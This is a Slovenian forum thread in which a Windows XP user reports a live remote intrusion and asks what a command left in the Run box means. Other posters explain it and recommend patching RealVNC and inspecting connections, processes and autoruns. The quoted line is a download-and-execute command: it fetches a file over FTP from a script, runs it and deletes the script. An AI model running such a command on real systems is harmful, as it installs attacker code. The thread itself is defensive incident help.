Forum » Pomoč in nasveti » Hekerski vdor v računalnik
Hekerski vdor v računalnik
Rokomah ::
Zaradi nekih napak sem moral začasno deinštalirati Super Pack 2 na winXP.
Zgodilo se mi je, da ob ponovnem zagonu in priklopu na internet, zagledam na ekranu premikanje miške in nenadno pisanje v Start/Run, očitno z namenom posega v register računalnika.
Seveda to nisem bil jest ampak je v tistem trenutko očitno nekdo uspel vdreti v moj računalnik.
Takoj, ko sem to opazil sem ugasnil računalnik.
Kasneje, ko sem šel po sledi in ugotavlhjal kaj je to bilo in kaj je naredil, sem našel tole vrstico vpisano v "Run" : i &ftp -n -s:i &045.exe&del i&exit, vendar mislim, da ni imel več časa delati naprej, ker sem računalnik, vsaj upam, pravočasno ugasnil.
Ali kdo ve, kaj ta ukazna vrstica pomeni ?????
Zgodilo se mi je, da ob ponovnem zagonu in priklopu na internet, zagledam na ekranu premikanje miške in nenadno pisanje v Start/Run, očitno z namenom posega v register računalnika.
Seveda to nisem bil jest ampak je v tistem trenutko očitno nekdo uspel vdreti v moj računalnik.
Takoj, ko sem to opazil sem ugasnil računalnik.
Kasneje, ko sem šel po sledi in ugotavlhjal kaj je to bilo in kaj je naredil, sem našel tole vrstico vpisano v "Run" : i &ftp -n -s:i &045.exe&del i&exit, vendar mislim, da ni imel več časa delati naprej, ker sem računalnik, vsaj upam, pravočasno ugasnil.
Ali kdo ve, kaj ta ukazna vrstica pomeni ?????
OmegaBlue ::
Nek ukaz prej ti še manjka v tisti vrstici, če povzamem nekdo ti je prenesel neko datoteko(skoraj sigurno trojanskega konja, ali ddos botka) s ftp strežnika na tvoj računalnik. Imaš slučajno naložen VNC? Po možnosti RealVNC? Ti svetujem da čimprej nadgradiš svojo različico, ker obstaja dokaj znana varnostna luknja in naše skriptno frocovje jo veselo uporablja. In preglej računalnik za sumljivimi servisi in povezavami na internet, v primeru da mu je stvar uspelo pognati.
Če na svojem disku najdeš tisti 045.exe se izredno priporočam za vzorec, da osebku zagrenimo življenje.
Datoteko/vzorec lahko pošlješ na virus@ovca.be, v zip/rar arhivu z geslom "virus". Stvar izredno pomaga pri odkrivanju 13 letnikov, ki mislijo da so boga prijeli za jajca.
Če na svojem disku najdeš tisti 045.exe se izredno priporočam za vzorec, da osebku zagrenimo življenje.
Datoteko/vzorec lahko pošlješ na virus@ovca.be, v zip/rar arhivu z geslom "virus". Stvar izredno pomaga pri odkrivanju 13 letnikov, ki mislijo da so boga prijeli za jajca.
Never attribute to malice that which can be adequately explained by stupidity.
Rokomah ::
Hvala za pomoč!
Vendar te moram vprašati še sledeče:
Da nadgradim svojo različico, česa?
Kako in kje pregledam svoj računalnik za sumljivimi servisi in povezavami na internet?
Ne vem točno kaj naj iščem na svojem disku, pod 045.exe ne najdem ničesar. Verjetno bi moral iskati kaj drugega. Mi priporočaš kakšen filter ali kriterije, da bi lažje poiskal.
Seveda, če bom kaj našel ti sigurno pošljem.
Še ekrat, hvala!
Vendar te moram vprašati še sledeče:
Da nadgradim svojo različico, česa?
Kako in kje pregledam svoj računalnik za sumljivimi servisi in povezavami na internet?
Ne vem točno kaj naj iščem na svojem disku, pod 045.exe ne najdem ničesar. Verjetno bi moral iskati kaj drugega. Mi priporočaš kakšen filter ali kriterije, da bi lažje poiskal.
Seveda, če bom kaj našel ti sigurno pošljem.
Še ekrat, hvala!
OmegaBlue ::
RealVNC bi bilo potrebno posodobit.
Aktivne povezave lahko preveriš z TCPView for Windows v2.4
Procese preglej z Process Explorer for Windows v10.21
In preglej kaj se ti zažene ob zagonu računalnika z AutoRuns for Windows v8.61
Če stvar ni spreminjala svoje lokacije, ftp privzeto prenese datoteke v C:\Documents and Settings\TvojeUporabniškoIme
Aktivne povezave lahko preveriš z TCPView for Windows v2.4
Procese preglej z Process Explorer for Windows v10.21
In preglej kaj se ti zažene ob zagonu računalnika z AutoRuns for Windows v8.61
Če stvar ni spreminjala svoje lokacije, ftp privzeto prenese datoteke v C:\Documents and Settings\TvojeUporabniškoIme
Never attribute to malice that which can be adequately explained by stupidity.
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Isass.exeOddelek: Programska oprema | 6244 (2106) | cucolino |
» | MSN pošilja sporočila....?Oddelek: Programska oprema | 1073 (1073) | sheldon |
» | Kar naenkrat proces "SYSTEM" porabi skoraj ves CPUOddelek: Pomoč in nasveti | 1120 (973) | primzx |
» | Matranje oz. odžiranje rama in cpu-jaOddelek: Pomoč in nasveti | 1138 (1025) | opeter |
» | Asimilacija Sysinternals uspelaOddelek: Novice / --Nerazporejeno-- | 3991 (3065) | darkolord |